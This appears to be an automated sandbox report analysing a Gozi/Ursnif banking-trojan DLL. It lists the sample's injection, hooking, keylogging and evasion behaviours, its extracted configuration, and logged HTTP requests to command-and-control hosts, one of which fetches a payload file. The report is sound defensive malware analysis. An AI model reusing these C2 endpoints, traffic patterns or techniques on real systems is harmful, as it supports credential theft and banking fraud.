Analysis Report SecuriteInfo.com.Generic.mg.81f401defa8faa2e.14295

Overview

General Information

Sample Name: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.14295 (renamed file extension from 14295 to dll)
Analysis ID: 343096
MD5: 81f401defa8faa2e4745590bc4f6c008
SHA1: bddb75a5aa6ed1272307ee096b59e2e61076a6f9
SHA256: 74cc533238ae33245519b52784db0e6adbd3380b350717fdc69d4e36714173d5

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: regsvr32.exe.2628.2.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "401", "system": "ad51e028b41086c1a9f4c3463eb17f2ehh", "size": "201292", "crc": "2", "action": "00000000", "id": "3300", "time": "1611307439", "user": "902d52678695dc15e71ab15cd837ada4", "hash": "0xa6ea74ae", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Virustotal: Detection: 33%
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll ReversingLabs: Detection: 25%

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.925789248.000002946AE90000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.938527540.000001F33B7D0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: \fk.pdb$. source: powershell.exe, 0000001A.00000003.995503256.000001E7C3283000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source: Binary string: c:\climbThrough\Bedclear\ranCentury\Exercise.pdb source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 2_2_05FC4FE1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 2_2_05FAE0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 2_2_05FB888D
Source: C:\Windows\explorer.exe Code function: 36_2_04DAECE0 RtlAllocateHeap,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 36_2_04DAECE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB05EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 2_2_05FB05EF

Networking:

Uses ping.exe to check the status of other devices and networks
Source: unknown Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 151.101.1.44 151.101.1.44
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /api1/sknLedsCbT_2B4wLtS_2FSf/C8Q4jriZvv/cHfqhQ9vl0vZGO5GP/AoJz8AHspssc/PRZs4sKJRg7/jH1SdHxUwyz5RQ/XuBuvpY5vvQV4LqIVVPRo/Z9PjsLKqohem6vf_/2FPMNyhDVIs00yE/BuUcdk1zY69hPWFKWm/NvZlHdA31/78WizcFNxnStriaFjzK7/v_2FVVwIwtM_2F54f79/vZDSa6ivA8gkZONEyW9488/C4H0pr8tv19LW/ZXxXdBMw/kw85mxmCjJ_2Bu32ObSyLwF/Yo3etxqqFR/p7BRLvnXvFdgAAGGn/C_2BCacpFUZ1/tah HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/8t0bR6VsCGA/ZdsVj6T4k_2FoN/BLdu_2BpSFXqKfcNrQm0V/ev0hudV9ITNV8_2B/N1NUzrdZB3VXtwr/czINvqLVnHAqL34hBx/_2F4Uw8ch/lO8_2BdQScLQi_2B7dkM/Y6U5VEgT5klQ01W1Rxk/oP4yI983nfNNLWO0FdmkwO/SlYApRJyCflSJ/F9Sp1wFu/11p6fGFU0cz_2F0ouRmTqJI/Jp2cYIM8B8/Yut84Zr03wWkVJ8HW/_2Bs4q032lo5/cXLpMBT2Oue/wmMCk0Do0CwkFa/R5_2BwVrdhg4SycoUpM1q/WdY_2FMtLacKdQm6/_2B87YclJ9Jv74j/B_2BPGCFKoDrv4QA/twu HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGvnkM47oJxaNOf/hFcn44i0YUVm90w4/QXHrnAASK_2F13d/5oQ_2F_2FIecjTnC8w/7KFf5o_2B/DvKXcUwkTj3k34oyPZ_2/BQTne0TWIY5r0yyHLCZ/QdvKBv0OKuZfpJiCfSiXDe/gwqygzT9hF5O5/iOEj4dxL/R_2FX_2Fv0bMpcldKbASVEW/DM59OBVxq7/9d4nMpuM8bNhV0TMy/RR84HPz6HIaw/UUGT2Q4OKHA/IoB4n4vcvYeMKu/tNuRkRQ0aDraFPOIy8Iid/GXrqJWUbrs/H HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/qid4UkFjrmJwDqv1uGoy3/_2BUJEVRCzS4dgw_/2BQScQk8a3HbiWi/d_2FOUrdxgv_2FzWHk/Apf0FwjNI/XCjSe3QcK9lg8PEDHYq_/2BEZPUJgDqlWZMm5T6e/5VAYvXDHpTHy9yII7VkiV8/_2BPKcMGMz7Ef/Vq5I_2Bu/jg1FflNR1bMph_2B7mMw8J7/1wxMorc_2F/N6CisPjn0a1IvUWNq/qjvzUpOhQ3cR/g18ZLbBaZpr/HqIkmdt9eu1lN1/4tABZghNsoNFyNad4ZlYW/GQkzB4t48KvSwznE/J6JNvAHQJAsplh2/rVWvzj4OOGDDMz5k/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: de-ch[1].htm.5.dr String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac1dc45,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac1dc45,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.5.dr String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.5.dr String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: unknown HTTP traffic detected: POST /api1/Ct0R_2Fx9NzTLjO/AAVczaEeXM_2F0PHvI/q2A7GpbWq/QRkIGlX7lHetqaCvuTxL/ZcPM1sCMitgD7TpJ4lL/YaaCrfmGr7HSdfEDFBfZy_/2F6yiEd5nRfk_/2FyBL0Qi/YvC2A5PzJxWwGDWFfurX0IH/Pl4gbL8NNR/pL5PpYu5LBw4qrHSp/5GLoVTygQHxi/lMsRYGiVP_2/BVFS_2BKJaP3UA/ShYtgHcZ3ceFWWHUPV6JY/AjkOe7pkq3uVlpG4/TAfeBct56eabx37/kmJm57Oum_2FZFTOYP/K3KMyMRiN/6VsuEdtgXSIPx_2FOzhO/Wfirq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Jan 2021 09:23:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: {8A523B9D-5C93-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DF4F2ABC3EEE61E1AD.TMP.4.dr String found in binary or memory: http://api10.laptok.at/api1/8t0bR6VsCGA/ZdsVj6T4k_2FoN/BLdu_2BpSFXqKfcNrQm0V/ev0hudV9ITNV8_2B/N1NUzr
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGv
Source: {92E377B0-5C93-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DF52531A3CB90001E8.TMP.4.dr String found in binary or memory: http://api10.laptok.at/api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGvnkM47
Source: explorer.exe, 00000024.00000000.981670591.000000000A897000.00000004.00000001.sdmp, ~DF703176632CAC7978.TMP.4.dr String found in binary or memory: http://api10.laptok.at/api1/sknLedsCbT_2B4wLtS_2FSf/C8Q4jriZvv/cHfqhQ9vl0vZGO5GP/AoJz8AHspssc/PRZs4s
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/Ct0R_2Fx9NzTLjO/AAVczaEeXM_2F0PHvI/q2A7GpbWq/QRkIGlX7lHetqaCvuTxL/ZcPM1sC
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/Y90IJ6cExB9qSgb/oNO0xdo8DXz1Gn7txC/ImxUnG_2B/FZLeWtZNMElpVIuMqsnD/ao9u_2B
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/qid4UkFjrmJwDqv1uGoy3/_2BUJEVRCzS4dgw_/2BQScQk8a3HbiWi/d_2FOUrdxgv_2FzWHk
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
